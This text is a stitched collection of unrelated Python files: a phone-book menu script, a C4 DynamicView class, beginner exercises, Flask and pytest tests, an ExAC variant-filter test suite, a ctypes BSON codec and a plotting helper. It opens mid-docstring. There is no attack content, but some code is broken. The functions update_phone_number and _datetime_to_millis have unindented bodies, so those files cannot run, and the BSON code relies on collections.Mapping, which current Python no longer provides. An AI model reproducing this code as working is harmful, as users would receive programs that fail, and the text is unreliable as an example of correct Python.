    Each entry is written followed by a newline; an empty list yields an
    empty file. Uses ``str.join`` instead of repeated ``+=`` concatenation,
    which was quadratic in the number of entries.
    """
    with open(file_name, "w") as file_handler:
        file_handler.write("".join(entry + "\n" for entry in phone_book_list))
# Remove
def remove_entry(first_name, last_name):
    """Rewrite the phone book, dropping every line containing "first,last"."""
    needle = first_name + "," + last_name
    with open(my_file, "r") as file_handler:
        kept = [line.replace("\n", "") for line in file_handler if needle not in line]
    write_list_to_file(kept, my_file)
# Look up
def look_up_name(first_name, last_name):
    """Print every phone-book line matching "first,last", or "Not Found".

    Bug fix: the original printed a "Not Found" banner for *each*
    non-matching line, so a successful lookup also printed "Not Found"
    many times. Now matches are printed as found and "Not Found" is
    printed exactly once, only when no line matched.
    """
    entry = first_name + "," + last_name
    found = False
    with open(my_file, "r") as file_handler:
        for line in file_handler:
            if entry in line:
                found = True
                print("*" * 30)
                print("Found : ", line.replace("\n", ""))
                print("*" * 30)
    if not found:
        print("*" * 30)
        print("Not Found")
        print("*" * 30)
# Print contents (note: update_name() below only prints the file; it does not update anything)
def update_name():
    """Print the whole phone book to stdout (despite the name, no update)."""
    with open(my_file, "r") as file_handler:
        print(file_handler.read(), end="")
# Update
def update_phone_number(first_name, last_name, new_phone_number):
phone_list = get_list_from_file(my_file)
entry_to_search = first_name + "," + last_name
remove_entry(first_name, last_name)
add_entry(first_name, last_name, new_phone_number)
# Main
def main():
    """Interactive menu loop for the phone book.

    Fixes over the original:
    - non-numeric menu input no longer crashes with ValueError;
    - the delete option no longer prompts for a phone number it ignored;
    - independent ``if`` chain replaced with ``elif`` (one branch per choice).
    """
    while True:
        print("-" * 30)
        print("Welcome To Phone_Book v1.0")
        print("-" * 30)
        print("Menu :")
        print("1. Add")
        print("2. Lookup")
        print("3. Update Phone Number")
        print("4. Delete")
        print("5. Exit")
        print()
        try:
            choice = int(input("Enter your selection : "))
        except ValueError:
            print("Please enter a number between 1 and 5.")
            continue
        if choice == 1:
            first_name = input("Enter First Name : ")
            last_name = input("Enter Last Name : ")
            phone_number = input("Enter Phone Number : ")
            add_entry(first_name, last_name, phone_number)
        elif choice == 2:
            first_name = input("Enter First Name : ")
            last_name = input("Enter Last Name : ")
            look_up_name(first_name, last_name)
        elif choice == 3:
            first_name = input("Enter First Name : ")
            last_name = input("Enter Last Name : ")
            new_phone_number = input("Enter New Phone Number : ")
            update_phone_number(first_name, last_name, new_phone_number)
        elif choice == 4:
            first_name = input("Enter First Name : ")
            last_name = input("Enter Last Name : ")
            remove_entry(first_name, last_name)
        elif choice == 5:
            exit()
# Run the interactive phone-book menu when executed as a script.
if __name__ == "__main__":
    main()
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provide a dynamic view."""
from contextlib import contextmanager
from operator import attrgetter
from typing import Iterable, Optional, Tuple, Union
from pydantic import Field
from ..mixin.model_ref_mixin import ModelRefMixin
from ..model import Component, Container, Element, Person, Relationship, SoftwareSystem
from ..model.static_structure_element import StaticStructureElement
from .relationship_view import RelationshipView
from .sequence_number import SequenceNumber
from .view import View, ViewIO
__all__ = ("DynamicView", "DynamicViewIO")
class DynamicViewIO(ViewIO):
    """
    Represent a dynamic view on a C4 model (serialization schema).

    Attributes:
        element_id: ID of the software system or container that this view is
            focused on; serialized as "elementId" in JSON.
    """

    element_id: Optional[str] = Field(default=None, alias="elementId")
class DynamicView(ModelRefMixin, View):
    """
    Represent a dynamic view on a C4 model.

    A dynamic diagram can be useful when you want to show how elements in a static
    model collaborate at runtime to implement a user story, use case, feature, etc.
    This dynamic diagram is based upon a UML communication diagram (previously known
    as a "UML collaboration diagram"). It is similar to a UML sequence diagram
    although it allows a free-form arrangement of diagram elements with numbered
    interactions to indicate ordering.

    Attributes:
        element: The software system or container that this view is focused on.
    """

    def __init__(
        self,
        *,
        element: Optional[Union[Container, SoftwareSystem]] = None,
        **kwargs,
    ) -> None:
        """Initialize a DynamicView.

        Note that we explicitly don't pass the software_system to the superclass as we
        don't want it to appear in the JSON output (DynamicView uses elementId
        instead).
        """
        if "software_system" in kwargs:
            raise ValueError(
                "Software system must be specified through the 'element' argument for "
                "DynamicViews"
            )
        super().__init__(**kwargs)
        self.element = element
        self.element_id = self.element.id if self.element else None
        # Generates the "1", "1.1", "2", ... interaction order numbers.
        self.sequence_number = SequenceNumber()

    def add(
        self,
        source: Element,
        destination: Element,
        description: Optional[str] = None,
        *,
        technology: Optional[str] = None,
    ) -> RelationshipView:
        """Add a relationship to this DynamicView.

        This will search for a relationship in the model from the source to the
        destination with matching technology (if specified). It will also look for
        situations where this interaction is a "response" in that it goes in the
        opposite direction to the relationship in the model. If a description is
        provided then this will be used in the view in preference to the description
        on the relationship.

        Examples:
            Example of a request/response, assuming a single relationship in the model:

                dynamic_view.add(container1, container2, "Requests data from")
                dynamic_view.add(container2, container1, "Sends response back to")
        """
        self.check_element_can_be_added(source)
        self.check_element_can_be_added(destination)
        relationship, response = self._find_relationship(
            source, description, destination, technology
        )
        if relationship is None:
            if technology:
                raise ValueError(
                    f"A relationship between {source.name} and "
                    f"{destination.name} with technology "
                    f"'{technology}' does not exist in the model."
                )
            else:
                raise ValueError(
                    f"A relationship between {source.name} and "
                    f"{destination.name} does not exist in "
                    "the model."
                )
        self._add_element(source, False)
        self._add_element(destination, False)
        return self._add_relationship(
            relationship,
            description=description or relationship.description,
            order=self.sequence_number.get_next(),
            response=response,
        )

    @contextmanager
    def subsequence(self):
        """
        Start a context-managed subsequence.

        Subsequences allow nested interaction sequences, showing "child" calls through
        numbering 1.1, 1.2, etc. Subsequences can themselves be nested.

        Examples:
            As an example, assume four Components, A-D. A makes a service request to B,
            which in turn calls both C then D to process the request before returning the
            results back to A. This can be shown using:

                dynamic_view.add(a, b, "Sends service request to")
                with dynamic_view.subsequence():
                    dynamic_view.add(b, c, "Makes subcall to")
                    dynamic_view.add(b, d, "Makes second subcall to")
                dynamic_view.add(b, a, "Sends results back to")

            This would result in four interactions shown, with orders "1", "1.1", "1.2"
            and "2" respectively.
        """
        try:
            self.sequence_number.start_subsequence()
            yield self
        finally:
            self.sequence_number.end_subsequence()

    @contextmanager
    def parallel_sequence(self, *, continue_numbering: bool = False):
        r"""
        Start a context-managed parallel sequence.

        Args:
            continue_numbering: Whether to continue the main sequence number
                from where the parallel sequence ended when its context is
                ended (`True`) or to reset the main sequence to where it began
                (`False`). The latter is usually done so that you can start a
                new parallel sequence.

        Examples:
            Parallel sequences allow for multiple parallel flows to share the same
            sequence numbers, for example,

                        /-> C -\
                A -> B -{       }-> E -> F
                        \-> D -/

            could happen concurrently but you want both B->C and B->D to get order
            number 2, and C->E and D->E to get order number 3. To achieve this,
            you would do:

                dynamic_view.add(a, b)             # Will be order "1"
                with dynamic_view.parallel_sequence():
                    dynamic_view.add(b, c)         # "2"
                    dynamic_view.add(c, e)         # "3"
                with dynamic_view.parallel_sequence(continue_numbering=True):
                    dynamic_view.add(b, d)         # "2" again
                    dynamic_view.add(d, e)         # "3"
                dynamic_view.add(e, f)             # "4"
        """
        try:
            self.sequence_number.start_parallel_sequence()
            yield self
        finally:
            self.sequence_number.end_parallel_sequence(continue_numbering)

    @property
    def relationship_views(self) -> Iterable[RelationshipView]:
        """Return the relationship views in order of their sequence number.

        Sorting uses "version number" style ordering, so 1 < 1.1 < 2 < 10.
        """
        return sorted(self._relationship_views, key=attrgetter("order"))

    def check_element_can_be_added(self, element: Element) -> None:
        """Make sure that the element is valid to be added to this view."""
        if not isinstance(element, StaticStructureElement):
            raise ValueError(
                "Only people, software systems, containers and components can be "
                "added to dynamic views."
            )
        # People are always allowed, regardless of scope.
        if isinstance(element, Person):
            return
        if isinstance(self.element, SoftwareSystem):
            # System scope, so only systems and containers are allowed
            if element is self.element:
                raise ValueError(
                    f"{element.name} is already the scope of this view and cannot be "
                    "added to it."
                )
            if isinstance(element, Component):
                raise ValueError(
                    "Components can't be added to a dynamic view when the scope is a "
                    "software system"
                )
            self.check_parent_and_children_not_in_view(element)
        elif isinstance(self.element, Container):
            # Container scope
            if element is self.element or element is self.element.parent:
                raise ValueError(
                    f"{element.name} is already the scope of this view and cannot be "
                    "added to it."
                )
            self.check_parent_and_children_not_in_view(element)
        else:
            # No scope - only systems can be added
            assert self.element is None
            if not isinstance(element, SoftwareSystem):
                raise ValueError(
                    "Only people and software systems can be added to this dynamic "
                    "view."
                )

    def _find_relationship(
        self,
        source: Element,
        description: Optional[str],
        destination: Element,
        technology: Optional[str],
    ) -> Tuple[Optional[Relationship], bool]:
        """Return the best matching relationship and whether it is a response."""
        # First preference is exactly matching description
        rel = next(
            (
                rel
                for rel in source.get_efferent_relationships()
                if rel.destination is destination
                and (rel.description == description or not description)
                and (rel.technology == technology or technology is None)
            ),
            None,
        )
        if rel:
            return rel, False
        # Next preference is non-matching description
        rel = next(
            (
                rel
                for rel in source.get_efferent_relationships()
                if rel.destination is destination
                and (rel.technology == technology or technology is None)
            ),
            None,
        )
        if rel:
            return rel, False
        # Finally look for "response" to relationship in the opposite direction but
        # ignore descriptions
        rel = next(
            (
                rel
                for rel in source.get_afferent_relationships()
                if rel.source is destination
                and (rel.technology == technology or technology is None)
            ),
            None,
        )
        return rel, True

    @classmethod
    def hydrate(
        cls, io: DynamicViewIO, *, element: Optional[Union[SoftwareSystem, Container]]
    ) -> "DynamicView":
        """Hydrate a new DynamicView instance from its IO."""
        return cls(
            element=element,
            **cls.hydrate_arguments(io),
        )
|
from datetime import datetime
from .parser import Parser
from .simulation import Simulation
from ._helpers import properties
# Module-level singletons shared by the convenience functions below.
parser = Parser()
simulation = Simulation()
# Shortcuts into the shared properties mapping (see ._helpers).
warnings = properties["warnings"]
messages = properties["messages"]
def parse(*args, **kwargs):
    """Parse input with the module-level Parser (arguments forwarded as-is)."""
    parser.parse(*args, **kwargs)
def run(*args, **kwargs):
    """Optionally parse the given input, then run the shared simulation."""
    if args or kwargs:
        parse(*args, **kwargs)
    simulation.run(parser)
def getReports():
    """Return the list of reports produced by the last simulation run."""
    return simulation.reports
def createReport():
    """Build a full report: a header naming the input file and a timestamp,
    followed by the concatenation of all individual simulation reports."""
    return f"""gpss.py Simulation Report - {parser.infile}
Generated on {datetime.now().strftime("%A, %B %d, %Y at %H:%M:%S %Z")
    .strip()}
""" + "".join(getReports())
|
# Desafio 101 - FUNÇÕES
'''
Crie um programa que tenha uma função chamada voto() que vai Receber
o ano de nascimento de uma pessoa, retornando um valor literal
indicando se a pessoa tem voto Obrigatório, Facultativo ou não vota.
'''
def voto(ano):
    """Classify Brazilian voting duty from a birth year.

    Returns 'Não vota!' under 16, 'Voto Facultativo!' for 16-17 or 65+,
    and 'Voto Obrigatório!' otherwise. Rewritten with guard clauses and a
    chained comparison instead of the original compound boolean.
    """
    from datetime import date
    idade = date.today().year - ano
    if idade < 16:
        return 'Não vota!'
    if idade < 18 or idade >= 65:
        return 'Voto Facultativo!'
    return 'Voto Obrigatório!'
# Main program: read the birth year and print the voting classification.
ano = int(input('Em que ano você nasceu? '))
print(voto(ano))
from json import dumps
import pytest
import os
def test_model_inference_success(test_client, input_line):
    """POSTing a valid payload to /predict must return HTTP 200."""
    payload = dumps(input_line)
    resp = test_client.post(
        '/predict', data=payload, content_type="application/json"
    )
    assert resp.status_code == 200
def test_model_inference_fails(test_client, input_line):
    """POSTing an invalid payload to /predict must return HTTP 400."""
    bad_payload = dumps({"test": 123})
    resp = test_client.post(
        '/predict', data=bad_payload, content_type="application/json"
    )
    assert resp.status_code == 400
@pytest.mark.run(order=-1)
def test_model_inference_no_model_fails(test_client, input_line):
    """Deleting the persisted model must make /predict respond 400.

    Runs last (order=-1) because it destroys the model file.
    """
    model_file = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        "..", "models", "classifier.joblib",
    )
    os.remove(model_file)
    resp = test_client.post(
        '/predict', data=dumps(input_line), content_type="application/json"
    )
    assert resp.status_code == 400
|
from django.contrib import admin
from electricity.models import electricity
# Register your models here.
# Expose the `electricity` model in the Django admin site.
admin.site.register(electricity)
'''
Instructions
You have access to a database of student_scores in the format of a dictionary. The keys in student_scores are the names of the students and the values are their exam scores.
Write a program that converts their scores to grades. By the end of your program, you should have a new dictionary called student_grades that should contain student names for keys and their grades for values. The final version of the student_grades dictionary will be checked.
DO NOT modify lines 1-7 to change the existing student_scores dictionary.
DO NOT write any print statements.
This is the scoring criteria:
Scores 91 - 100: Grade = "Outstanding"
Scores 81 - 90: Grade = "Exceeds Expectations"
Scores 71 - 80: Grade = "Acceptable"
Scores 70 or lower: Grade = "Fail"
Expected Output
'{'Harry': 'Exceeds Expectations', 'Ron': 'Acceptable', 'Hermione': 'Outstanding', 'Draco': 'Acceptable', 'Neville': 'Fail'}'
Hint
Remember that looping through a Dictionary will only give you the keys and not the values.
If in doubt as to why your code is not doing what you expected, you can always print out the intermediate values.
At the end of your program, the print statement will show the final student_scores dictionary, do not change this.
'''
student_scores = {
    "Harry": 81,
    "Ron": 78,
    "Hermione": 99,
    "Draco": 74,
    "Neville": 62,
}
# 🚨 Don't change the code above 👆
#TODO-1: Create an empty dictionary called student_grades.
student_grades = {}
#TODO-2: Write your code below to add the grades to student_grades.👇
# Iterate key/value pairs directly instead of re-indexing the dict on every
# comparison (idiomatic .items(); avoids four lookups per student).
for name, score in student_scores.items():
    if score >= 91:
        student_grades[name] = "Outstanding"
    elif score >= 81:
        student_grades[name] = "Exceeds Expectations"
    elif score >= 71:
        student_grades[name] = "Acceptable"
    else:
        student_grades[name] = "Fail"
# 🚨 Don't change the code below 👇
print(student_grades)
"""
Tests for the ``aliquotmaf.filters.ExAC`` class.
"""
from collections import OrderedDict
import pytest
from maflib.column_types import NullableFloatColumn
from aliquotmaf.converters.builder import get_builder
from aliquotmaf.filters import ExAC
# ExAC (non-TCGA) allele-frequency MAF columns, one per subpopulation.
subpops = [
    "nontcga_ExAC_AF_Adj",
    "nontcga_ExAC_AF",
    "nontcga_ExAC_AF_AFR",
    "nontcga_ExAC_AF_AMR",
    "nontcga_ExAC_AF_EAS",
    "nontcga_ExAC_AF_FIN",
    "nontcga_ExAC_AF_NFE",
    "nontcga_ExAC_AF_OTH",
    "nontcga_ExAC_AF_SAS",
]
@pytest.fixture
def setup_filter():
    """Factory fixture: build ExAC filters, shutting them all down at teardown."""
    created = []

    def _make_filter(cutoff):
        # cutoff: allele-frequency threshold above which a record is filtered.
        curr = ExAC.setup(cutoff)
        created.append(curr)
        return curr

    yield _make_filter
    # Teardown: release resources for every filter created during the test.
    for record in created:
        record.shutdown()
@pytest.fixture
def test_scheme(get_test_scheme):
    """Scheme fixture with one nullable-float column per ExAC subpopulation.

    Builds the mapping with a generator expression instead of the original
    append loop (idiomatic; same ordering).
    """
    return get_test_scheme(OrderedDict((p, NullableFloatColumn) for p in subpops))
def test_setup_exac(setup_filter):
    """ExAC.setup must hand back an ExAC filter instance."""
    assert isinstance(setup_filter(0.0004), ExAC)
def test_exac_filter_1(test_scheme, setup_filter, get_empty_maf_record):
    """All subpopulation frequencies None -> record is not filtered."""
    filterer = setup_filter(0.0004)
    record = get_empty_maf_record
    for key in subpops:
        record[key] = get_builder(key, test_scheme, value=None)
    assert filterer.filter(record) is False
def test_exac_filter_2(test_scheme, setup_filter, get_empty_maf_record):
    """All frequencies strictly below the cutoff -> record is not filtered."""
    filterer = setup_filter(0.0004)
    record = get_empty_maf_record
    for key in subpops:
        record[key] = get_builder(key, test_scheme, value=0.0003)
    assert filterer.filter(record) is False
def test_exac_filter_3(test_scheme, setup_filter, get_empty_maf_record):
    """All frequencies exactly at the cutoff -> record is not filtered."""
    filterer = setup_filter(0.0004)
    record = get_empty_maf_record
    for key in subpops:
        record[key] = get_builder(key, test_scheme, value=0.0004)
    assert filterer.filter(record) is False
def test_exac_filter_4(test_scheme, setup_filter, get_empty_maf_record):
    """A single subpopulation frequency above the cutoff triggers the filter."""
    filterer = setup_filter(0.0004)
    record = get_empty_maf_record
    for key in subpops:
        record[key] = get_builder(key, test_scheme, value=0.0004)
    record["nontcga_ExAC_AF_Adj"] = get_builder(
        "nontcga_ExAC_AF_Adj", test_scheme, value=0.00041
    )
    assert filterer.filter(record) is True
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
import binascii
import collections
import copy
import ctypes
import datetime
import hashlib
import uuid
import six
from . import c
from .utils import CObjectWrapper, PrettyOrderedDict, coerce_char_p, coerce_str
# Concrete type returned by hashlib constructors (for isinstance dispatch).
HASH = type(hashlib.md5())
INT_MAX = 2 ** 31 - 1   # largest value encoded as a BSON int32
LONG_MAX = 2 ** 63 - 1  # largest value encoded as a BSON int64
# Name of the BSON primary-key field (as a C char pointer).
ID_KEY_NAME = coerce_char_p(c.JDBIDKEYNAME)
class BSONEncodeError(Exception):
    """Raised when a Python object cannot be encoded into BSON."""

    def __init__(self, obj):
        super(BSONEncodeError, self).__init__(
            'Could not encode object {obj}.'.format(obj=repr(obj))
        )
class BSONDecodeError(Exception):
    """Raised when BSON data cannot be decoded into Python objects."""

    def __init__(self, msg=None):
        default = 'Could not decode BSON object.'
        super(BSONDecodeError, self).__init__(default if msg is None else msg)
class MD5(six.binary_type):
    """Custom subclass for content of an MD5 binary field.

    Mimics the hashlib digest interface (copy/digest/hexdigest) over the
    raw 16-byte digest stored as bytes.
    """

    def copy(self):
        return copy.copy(self)

    def digest(self):
        # The object *is* the raw digest; return a fresh copy of it.
        return self.copy()

    def hexdigest(self):
        return coerce_str(binascii.hexlify(self))
def _datetime_to_millis(value):
epoch = datetime.datetime.utcfromtimestamp(0)
delta = value - epoch
millis = int(delta.total_seconds() * 1000)
return millis
def _bson_encode_element(key, value, into):
    """Append one key/value pair to the BSON buffer `into`.

    Dispatches on the Python type of `value` (the isinstance order below is
    significant — see inline notes). Raises BSONEncodeError for unsupported
    types or C-level append failures.
    """
    key = coerce_char_p(key)
    if value is None:
        r = c.bson.append_null(into, key)
    elif isinstance(value, six.text_type):
        value = coerce_char_p(value)
        if key == ID_KEY_NAME:
            # The primary-key field is stored as a BSON ObjectId, not a string.
            oid = c.BSONOID.from_string(value)
            r = c.bson.append_oid(into, key, ctypes.byref(oid))
        else:
            r = c.bson.append_string_n(into, key, value, len(value))
    elif isinstance(value, bool):
        r = c.bson.append_bool(into, key, value)
    elif isinstance(value, six.integer_types):
        # Need to be after bool because bool is a subclass of int.
        if value > LONG_MAX:
            raise BSONEncodeError(value)
        elif value > INT_MAX:
            r = c.bson.append_long(into, key, value)
        else:
            r = c.bson.append_int(into, key, value)
    elif isinstance(value, float):
        r = c.bson.append_double(into, key, value)
    elif isinstance(value, datetime.datetime):
        millis = _datetime_to_millis(value)
        r = c.bson.append_date(into, key, millis)
    elif isinstance(value, datetime.date):
        # Checked after datetime (datetime is a subclass of date);
        # plain dates are stored as midnight of that day.
        value = datetime.datetime.combine(value, datetime.datetime.min.time())
        millis = _datetime_to_millis(value)
        r = c.bson.append_date(into, key, millis)
    elif isinstance(value, uuid.UUID):
        data = value.bytes
        r = c.bson.append_binary(into, key, c.BSON_BIN_UUID, data, len(data))
    elif isinstance(value, (HASH, MD5,)):
        data = value.digest()
        r = c.bson.append_binary(into, key, c.BSON_BIN_MD5, data, len(data))
    elif isinstance(value, six.binary_type):
        # Need to be after MD5 because MD5 is a subclass of six.binary_type.
        buf = ctypes.create_string_buffer(value, len(value))
        r = c.bson.append_binary(into, key, c.BSON_BIN_BINARY, buf, len(value))
    elif isinstance(value, collections.Mapping):
        # NOTE(review): collections.Mapping/Sequence moved to collections.abc
        # in Python 3.3 and were removed from `collections` in 3.10 — confirm
        # the supported interpreter range for this six-era module.
        r = c.bson.append_start_object(into, key)
        if r != c.BSON_OK:  # pragma: no cover.
            raise BSONEncodeError(value)
        for k in value:
            _bson_encode_element(k, value[k], into)
        r = c.bson.append_finish_object(into)
        if r != c.BSON_OK:  # pragma: no cover.
            raise BSONEncodeError(value)
    elif isinstance(value, collections.Sequence):
        r = c.bson.append_start_array(into, key)
        if r != c.BSON_OK:  # pragma: no cover.
            raise BSONEncodeError(value)
        for i, v in enumerate(value):
            # BSON arrays are objects keyed by stringified indexes.
            _bson_encode_element(str(i), v, into)
        r = c.bson.append_finish_array(into)
        if r != c.BSON_OK:  # pragma: no cover.
            raise BSONEncodeError(value)
    else:
        # TODO: Implement tolerance mode, insert undefined for objects not
        # encodable. Or maybe use pickle to save the binary?
        r = c.BSON_ERROR
    if r != c.BSON_OK:
        raise BSONEncodeError(value)
def _bson_decode_double(bsiter):
    """Read the double at the iterator's current position."""
    return c.bson.iterator_double_raw(bsiter)
def _bson_decode_int(bsiter):
    """Read the int32 at the iterator's current position."""
    return c.bson.iterator_int_raw(bsiter)
def _bson_decode_long(bsiter):
    """Read the int64 at the iterator's current position."""
    return c.bson.iterator_long_raw(bsiter)
def _bson_decode_bool(bsiter):
    """Read the boolean at the iterator's current position."""
    return c.bson.iterator_bool_raw(bsiter)
def _bson_decode_oid(bsiter):
    """Read the ObjectId at the current position and render it as text."""
    ref = c.bson.iterator_oid(bsiter)
    return six.text_type(ref.contents)
def _bson_decode_string(bsiter):
    """Read the string at the current position, dropping the trailing NUL."""
    size = c.bson.iterator_string_len(bsiter)
    data_p = c.bson.iterator_string(bsiter)
    s = ctypes.string_at(data_p, size - 1)  # Minus NULL character.
    return coerce_str(s)
def _bson_decode_date(bsiter):
    """Read a BSON date (millis since epoch) as a naive UTC datetime."""
    timestamp = c.bson.iterator_date(bsiter)
    dt = datetime.datetime.utcfromtimestamp(timestamp / 1000)
    return dt
def _bson_decode_array(bsiter):
    """Decode an embedded array by walking a sub-iterator over it."""
    sub = c.bson.iterator_create()
    c.bson.iterator_subiterator(bsiter, sub)
    items = _bson_decode_array_contents(sub)
    c.bson.iterator_dispose(sub)
    return items
def _bson_decode_object(bsiter):
    """Decode an embedded document by walking a sub-iterator over it."""
    sub = c.bson.iterator_create()
    c.bson.iterator_subiterator(bsiter, sub)
    mapping = _bson_decode_object_contents(sub)
    c.bson.iterator_dispose(sub)
    return mapping
def _bson_decode_binary(bsiter):
    """Decode a BSON binary field, dispatching on its binary subtype."""
    subtype = c.bson.iterator_bin_type(bsiter)
    try:
        subdecoder = _BIN_SUBTYPE_DECODERS[subtype]
    except KeyError:  # pragma: no cover
        raise BSONDecodeError(
            'Could not decode binary with key {key} of type {subtype}'.format(
                key=coerce_str(c.bson.iterator_key(bsiter)),
                subtype=_BIN_SUBTYPE_NAMES[subtype],
            )
        )
    size = c.bson.iterator_bin_len(bsiter)
    data_p = c.bson.iterator_bin_data(bsiter)
    data = ctypes.string_at(data_p, size=size)
    return subdecoder(data)
# Dispatch table: BSON element type code -> decoder callable.
_TYPE_DECODERS = {
    c.BSON_DOUBLE: _bson_decode_double,
    c.BSON_STRING: _bson_decode_string,
    c.BSON_OBJECT: _bson_decode_object,
    c.BSON_ARRAY: _bson_decode_array,
    c.BSON_BINDATA: _bson_decode_binary,
    c.BSON_UNDEFINED: lambda i: None,
    c.BSON_OID: _bson_decode_oid,
    c.BSON_BOOL: _bson_decode_bool,
    c.BSON_DATE: _bson_decode_date,
    c.BSON_NULL: lambda i: None,
    c.BSON_INT: _bson_decode_int,
    c.BSON_LONG: _bson_decode_long,
}
# Human-readable names for BSON type codes (index == type code), used in
# decode error messages.
_TYPE_NAMES = [
    'BSON_EOO',
    'BSON_DOUBLE',
    'BSON_STRING',
    'BSON_OBJECT',
    'BSON_ARRAY',
    'BSON_BINDATA',
    'BSON_UNDEFINED',
    'BSON_OID',
    'BSON_BOOL',
    'BSON_DATE',
    'BSON_NULL',
    'BSON_REGEX',
    'BSON_DBREF',
    'BSON_CODE',
    'BSON_SYMBOL',
    'BSON_CODEWSCOPE',
    'BSON_INT',
    'BSON_TIMESTAMP',
    'BSON_LONG',
]
# Dispatch table: binary subtype code -> constructor for the decoded value.
_BIN_SUBTYPE_DECODERS = {
    c.BSON_BIN_BINARY: lambda data: data,
    c.BSON_BIN_UUID: lambda data: uuid.UUID(bytes=data),
    c.BSON_BIN_MD5: MD5,
}
# Names for binary subtype codes (index == subtype), used in error messages.
_BIN_SUBTYPE_NAMES = [
    'BSON_BIN_BINARY',
    'BSON_BIN_FUNC',
    'BSON_BIN_BINARY_OLD',
    'BSON_BIN_UUID',
    'BSON_BIN_MD5',
    'BSON_BIN_USER',
]
def _bson_decode_array_contents(subiter):
    """Decode consecutive elements of an array sub-iterator into a list.

    BSON arrays are documents whose keys are "0", "1", ...; the keys are
    validated to be sequential indexes while decoding.
    """
    subitems = []
    while True:
        value_type = c.bson.iterator_next(subiter)
        if value_type == c.BSON_EOO:
            # End of the embedded document.
            break
        key = coerce_str(c.bson.iterator_key(subiter))
        try:
            key = int(key)
            assert key == len(subitems)
        except (AssertionError, ValueError):  # pragma: no cover
            # Error if the keys are not integers representing array indexes.
            # This shouldn't happen if the BSON object is valid.
            # TODO: Better error message.
            raise BSONDecodeError
        try:
            decoder = _TYPE_DECODERS[value_type]
        except KeyError:  # pragma: no cover
            raise BSONDecodeError(
                'Could not decode object with key {key} of type {type}'.format(
                    key=key, type=_TYPE_NAMES[value_type],
                )
            )
        subitems.append(decoder(subiter))
    return subitems
def _bson_decode_object_contents(subiter):
    """Decode consecutive key/value pairs of a document sub-iterator.

    Returns a PrettyOrderedDict preserving the BSON field order.
    """
    subitems = PrettyOrderedDict()
    while True:
        value_type = c.bson.iterator_next(subiter)
        if value_type == c.BSON_EOO:
            # End of the embedded document.
            break
        key = coerce_str(c.bson.iterator_key(subiter))
        try:
            decoder = _TYPE_DECODERS[value_type]
        except KeyError:  # pragma: no cover
            raise BSONDecodeError(
                'Could not decode object with key {key} of type {type}'.format(
                    key=key, type=_TYPE_NAMES[value_type],
                )
            )
        subitems[key] = decoder(subiter)
    return subitems
def _get_data(bs):
    """Return the raw byte content of a wrapped BSON object."""
    size = ctypes.c_int()
    ptr = c.bson.data2(bs._wrapped, ctypes.byref(size))
    return ctypes.string_at(ptr, size.value)
class BSON(CObjectWrapper):
    """Wrapper for a finished (immutable) BSON construct."""

    def __init__(self, wrapped):
        """Initialize a wrapper for a *finished* BSON struct.

        :param wrapped: BSON struct to be wrapped; it is deleted via
            ``c.bson.del_`` when this wrapper is finalized.
        """
        super(BSON, self).__init__(wrapped=wrapped, finalizer=c.bson.del_)

    @classmethod
    def encode(cls, obj, as_query=False):
        """Encode a Python mapping into BSON.

        :param obj: a mapping; anything else raises BSONEncodeError.
        :param as_query: initialize the buffer as a query document.
        """
        if not isinstance(obj, collections.Mapping):
            raise BSONEncodeError(obj)
        wrapped = c.bson.create()
        if as_query:
            c.bson.init_as_query(wrapped)
        else:
            c.bson.init(wrapped)
        for key in obj:
            _bson_encode_element(key=key, value=obj[key], into=wrapped)
        # Mark the buffer as finished before handing ownership to the wrapper.
        c.bson.finish(wrapped)
        return cls(wrapped)

    def decode(self):
        """Decode this BSON document into a PrettyOrderedDict."""
        bsiter = c.bson.iterator_create()
        c.bson.iterator_init(bsiter, self._wrapped)
        obj = _bson_decode_object_contents(bsiter)
        c.bson.iterator_dispose(bsiter)
        return obj

    def __repr__(self):  # pragma: no cover
        return '<BSON {data}>'.format(data=repr(_get_data(self)))

    def __eq__(self, other):
        # Compare by raw byte content; `other` may be a BSON or raw bytes.
        # NOTE(review): defining __eq__ without __hash__ leaves instances
        # unhashable on Python 3 — confirm that is intended.
        if self is other:
            return True
        if isinstance(other, BSON):
            other = _get_data(other)
        return _get_data(self) == other

    def __ne__(self, other):  # pragma: no cover
        return not (self == other)
def encode(obj, as_query=False):
    """Module-level convenience wrapper around BSON.encode."""
    return BSON.encode(obj, as_query=as_query)
def decode(bs):
    """Module-level convenience wrapper: decode a wrapped BSON object."""
    return bs.decode()
|
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
import pathlib
def plot_comparison(control, control_sim, modulated, modulated_sim, num_models, ylabel=None, title=None,
                    x_ticks=tuple(), width=None, height=None, dir_path=None, save=False, filename=None):
    """Scatter per-model simulated values against experimental mean±std.

    For each model index i, plots the sorted modulated simulation values
    (black) and the control simulation value (green), spreading ties
    horizontally around x=i so duplicates remain visible, plus error bars
    for the modulated (red) and control (blue) experimental data.

    NOTE(review): `modulated_sim[i]` is sorted in place (caller's data is
    mutated); `control`/`modulated` are assumed to be mappings with 'mean'
    and 'std' keys — confirm with callers.
    """
    fig, ax = plt.subplots(1, figsize=(6, 8))
    fig.set_size_inches(width, height)
    for i in range(num_models):
        x = i * np.ones(len(modulated_sim[i]))
        modulated_sim[i] = np.sort(modulated_sim[i])
        # z[j] holds the run length of equal values starting at j (0 elsewhere).
        z = np.zeros(len(modulated_sim[i]))
        j = 0
        while j <= (len(modulated_sim[i]) - 2):
            k = 0
            while j + k + 1 <= (len(modulated_sim[i]) - 1) and modulated_sim[i][j + k] == modulated_sim[i][j + k + 1]:
                k = k + 1
            z[j] = k + 1
            j = j + k + 1
        # Spread each run of identical values symmetrically around x=i,
        # offset by dx per point (even-sized runs get a half-step shift).
        sumnj = 0
        dx = 0.1
        for j in range(len(z)):
            nj = int(z[j])
            ev = 0
            if np.mod(nj, 2) == 0:
                ev = dx * 0.5
            for k in range(nj):
                pos = np.ceil(k / 2) * (-1) ** (np.mod(k, 2))
                x[sumnj + k] = i + dx * pos + ev
            sumnj = sumnj + nj
        ax.plot(x, modulated_sim[i], 'ok', markersize=3, c='black')
